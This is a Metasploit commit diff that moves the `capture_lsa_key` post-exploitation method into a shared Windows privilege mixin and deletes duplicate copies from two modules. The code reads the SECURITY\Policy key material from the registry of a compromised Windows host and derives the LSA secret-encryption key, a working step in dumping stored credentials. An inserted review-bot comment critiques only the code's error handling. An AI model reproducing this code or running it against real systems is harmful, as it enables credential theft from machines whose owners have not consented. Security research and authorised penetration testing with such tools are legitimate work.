move capture_lsa_key to priv

bug/bundler_fix
Rob Fuller 2013-10-16 23:45:28 -04:00
parent 1a9fcf2cbb
commit 60d8ee1434
3 changed files with 44 additions and 78 deletions


@ -151,4 +151,48 @@ module Msf::Post::Windows::Priv
return key.pack("C*")
end
#
# Returns the LSA key upon input of the unscrambled bootkey
#
def capture_lsa_key(bootkey)
begin
vprint_status("Getting PolSecretEncryptionKey...")
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
pol = ok.query_value("").data
vprint_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
ok.close
print_status("XP or below client")
@vista = 0
rescue
vprint_status("Trying 'V72' style...")
vprint_status("Getting PolEKList...")
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
pol = ok.query_value("").data
vprint_good("Pol: #{pol.unpack("H*")[0]}")
ok.close
print_status("Vista or above client")
@vista = 1
end
if( @vista == 1 )
lsakey = decrypt_lsa(pol, bootkey)
lsakey = lsakey[68,32]
vprint_good(lsakey.unpack("H*")[0])
else
md5x = Digest::MD5.new()
md5x << bootkey
(1..1000).each do
md5x << pol[60,16]
end
rc4 = OpenSSL::Cipher::Cipher.new("rc4")
rc4.key = md5x.digest
lsakey = rc4.update(pol[12,48])
lsakey << rc4.final
lsakey = lsakey[0x10..0x1F]
end
return lsakey
end
end
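Review bot: The XP branch slices `pol[60,16]` and `pol[12,48]` without checking the registry value's length, so a short or empty PolSecretEncryptionKey reaches `md5x << nil` and dies with a TypeError far from the cause; a guard such as `raise "PolSecretEncryptionKey too short: #{pol.length} bytes" if pol.length < 76` before the MD5 loop would name the problem (the Vista branch's `lsakey[68,32]` on the `decrypt_lsa` output has the same exposure). The bare `rescue` also classifies any failure of the first `open_key` — a permission error included — as "Vista or above", and the `ok.close` calls run only on the success path, so a failing `query_value` leaves the handle open; an `ensure` or a narrower rescue class would tighten both. `OpenSSL::Cipher::Cipher.new("rc4")` is the deprecated spelling of `OpenSSL::Cipher.new("rc4")`. The header comment could also state that the method sets `@vista` as a side effect and returns a 16-byte (XP) or 32-byte (Vista+) LSA key; the method ending at `return key.pack("C*")` at the top of the hunk starts outside it.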


@ -53,44 +53,6 @@ class Metasploit3 < Msf::Post
end
end
def capture_lsa_key(bootkey)
begin
print_status("Getting PolSecretEncryptionKey...") if( datastore['DEBUG'] )
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
pol = ok.query_value("").data
print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}") if( datastore['DEBUG'] )
ok.close
print_status("XP compatible client")
@vista = 0
rescue
print_status("Trying 'Vista' style...")
print_status("Getting PolEKList...") if( datastore['DEBUG'] )
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
pol = ok.query_value("").data
ok.close
print_status("Vista compatible client")
@vista = 1
end
if( @vista == 1 )
lsakey = decrypt_lsa(pol, bootkey)
lsakey = lsakey[68,32]
else
md5x = Digest::MD5.new()
md5x << bootkey
(1..1000).each do
md5x << pol[60,16]
end
rc4 = OpenSSL::Cipher::Cipher.new("rc4")
rc4.key = md5x.digest
lsakey = rc4.update(pol[12,48])
lsakey << rc4.final
lsakey = lsakey[0x10..0x1F]
end
return lsakey
end
def decrypt_secret(secret, key)
# Ruby implementation of SystemFunction005


@ -30,46 +30,6 @@ class Metasploit3 < Msf::Post
))
end
def capture_lsa_key(bootkey)
begin
#print_status("Getting PolSecretEncryptionKey...")
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
pol = ok.query_value("").data
#print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
ok.close
print_status("XP compatible client")
@vista = 0
rescue
#print_status("Trying 'V72' style...")
#print_status("Getting PolEKList...")
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
pol = ok.query_value("").data
#print_good("Pol: #{pol.unpack("H*")[0]}")
ok.close
print_status("V/7/2k8 compatible client")
@vista = 1
end
if( @vista == 1 )
lsakey = decrypt_lsa(pol, bootkey)
lsakey = lsakey[68,32]
#print_good(lsakey.unpack("H*")[0])
else
md5x = Digest::MD5.new()
md5x << bootkey
(1..1000).each do
md5x << pol[60,16]
end
rc4 = OpenSSL::Cipher::Cipher.new("rc4")
rc4.key = md5x.digest
lsakey = rc4.update(pol[12,48])
lsakey << rc4.final
lsakey = lsakey[0x10..0x1F]
end
return lsakey
end
def decrypt_secret(secret, key)
# Ruby implementation of SystemFunction005